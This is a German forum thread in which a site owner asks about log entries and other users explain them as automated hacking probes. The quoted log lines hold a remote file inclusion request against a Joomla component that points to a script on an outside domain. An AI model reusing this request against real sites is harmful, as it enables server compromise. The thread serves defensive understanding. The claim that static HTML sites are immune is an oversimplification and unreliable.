Logfile-Angabe unklar. Was ist das?

[Alayna]

Hi,

da ich dies zum ersten Mal in meinen Logiles sehe, weiß ich nicht viel damit anzufangen. Kann mich da jemand netterweise schlauer machen?
Handelt es sich um eine Suchmaschine? Oder was bedeutet das?

77.xxx.xxx.xx - - [01/Jun/2008:20:44:43 +0200] "GET /links.html%3C/administrator/components/com_joomla_flash_uploader/
install.joomla_flash_uploader.php?mosConfig_absolute_path=
https://www. fingerxs.eu/modules/sxxxxxx.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
77.xxx.xxx.xx - - [01/Jun/2008:20:44:45 +0200] "GET /administrator/components/com_joomla_flash_uploader/
install.joomla_flash_uploader.php?mosConfig_absolute_path=
https://www. fingerxs.eu/modules/sxxxxx.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"

VG

[MBDealer]

Hallo Alayna,

da hat wohl einer versucht deine Webseite zu hacken indem er versucht hat eine bestimmte Sicherheitslücke auszunutzen.

Und Vorsicht bei solchen Einträgen die sistem.txt Datei die in deinem Logfiles aufgetaucht ist ist verseucht mit einem Trojaner.

[Alayna]

Hallo MBDealer,

danke für deine Antwort. So sieht also ein Hackversuch aus.
Hm ...

[grossy]

Naja, so ein richtiger Hackversuch ist das noch nicht. Da wird erstmal geschaut, ob Du Software installiert hast, die Lücken/Angriffsmöglichkeiten enthalten. Aber da das ja hoffentlich nicht so ist....

[Alayna]

Hallo grossy,

ja, an dem Punkt bin ich gerade - also versuche durchzublicken, was da passiert ist. Weil der Hackodernurguckversuch nicht nur vorgestern sondern auch gestern in den Logfiles drin war. Bin mal gespannt, wann die Leute das merken, dass ich keine Software installiert habe.

Ich benutze kein CMS, kein Joomla, nix. Ich bin ein Dinosaurier , ich erstelle meine Seiten manuell. Bin aber ratlos, was ich tun kann, damit der Mensch nicht noch Erfolg hat. Habe meinen Hoster angemailt und gefragt, was ich tun kann und die meinten:

"... wenn Sie Ihre Seite selber mit XHTML und CSS erstellen, werden Hackangriffe keinen Erfolg haben. Die meisten Seite die gehackt werden, basieren auf PHP."

Na ich hoffe, das ist wirklich so.

[Pompom]

also versuche durchzublicken, was da passiert ist. Weil der Hackodernurguckversuch nicht nur vorgestern sondern auch gestern in den Logfiles drin war.

Wenn du eine Domain hast, die bekannt(er) ist, ist dies normal. Die Tests laufen i.d.R. automatisiert ab. Gelingt der Einbruch, erfolgt die Rückmeldung über die gelungene Intallation einer Backdoor meist über einen IRC-Channel.

[grossy]

@Alayna

Mach Dir nicht son einen Kopf, das was in Deinen Logfiles steht, gehört zu dem normalen Hintergrundrauschen im Internet. Bei meinen steht da noch einiges mehr drin....

[Ice Man]

Den "libwww-perl/5.808" würde ich eh sperren, der sucht immer nach sicherheitslücken, vorallem bei phpbb Foren ist der sehr aktiv.

Hab täglich über 100 gesperrte Einträge im Logfile...

[Alayna]

@Pompom
Meine Webseite ist absolut unwichtig und unbekannt (für Hacker). Weshalb mich das Ganze stutzig macht, zumal derjenige bisher 2 x meine Webseite "abgecheckt" hat. Eigentlich müsste derjenige doch gemerkt haben, dass ich kein CMS benutze.

@grossy
Neee, einen Kopf mache ich mir nicht, aber ich weiß gern über solche Dinge Bescheid, damit ich für die nächsten Male nicht wieder nachfragen muss, was das ist.

@Ice Man
Hm, laut Support-Team bin ich auf der sicheren Seite mit meinen nur .html und .css Dateien. Aber es ist interessant zu wissen, dass "libwww-perl/5.808" nach Sicherheitslücken sucht, das wusste ich auch noch nicht.

Danke Euch allen für Eure Kommentare, ich habe wieder was dazu gelernt.

Edit:
war nix

[Alayna]

Mir fällt ein, ich war heute früh für 1 Sekunde auf der Seite https://www. fingerxs.eu/modules/bösedatei.txt? - weil ich gucken wollte, was das für eine Seite ist. Habe ich mir dadurch womöglich schon den Trojaner eingefangen?

Eine Warnung oder sowas habe ich von meiner Firewall/Schutzprogramm nicht erhalten. O Mann ... bin ich blöd ...

[Southmedia]

Nein, normalerweise ist das kein Problem. Die Datei entfalten ihre komplette Wirkung erst, wenn sie irgendwo eingebunden werden konnten. Mach dir also nicht zu viele Sorgen.

[Alayna]

Danke, du hast meinen Abend gerettet @Southmedia.

[Malte Landwehr]

Meine Webseite ist absolut unwichtig und unbekannt (für Hacker).

Die Skripte laufen meist nicht gesteuert sondern graben Linklisten (z.B. vom DMOZ oder Wikipedia) ab oder holen sich URLs per Google-Suche.

Weshalb mich das Ganze stutzig macht, zumal derjenige bisher 2 x meine Webseite "abgecheckt" hat. Eigentlich müsste derjenige doch gemerkt haben, dass ich kein CMS benutze.

Skritpkiddys sind nicht unbedingt die besten Programmierer und da kann das schon mal vorkommen. Arg wirds nur wenn eine Eindloschschleife mit einem Aufruf deiner Domain entsteht und die den Bot nicht blockst.

[Alayna]

@nXplorer

Danke für die Info.
Leider habe ich keinen Zugriff auf die .htaccess, weil ich nur das Startpaket bei meinem Hoster habe. Ich will mal hoffen, dass ab nun Ruhe herrscht.

[GreenHorn]

Hab täglich über 100 gesperrte Einträge im Logfile...

Hatte letzten Monat 30.121 und dazu noch mal ein wenig Grobzeug (404, 500 und 400) womit der Server nix anfangen konnte. Ne Menge Freaks da draußen...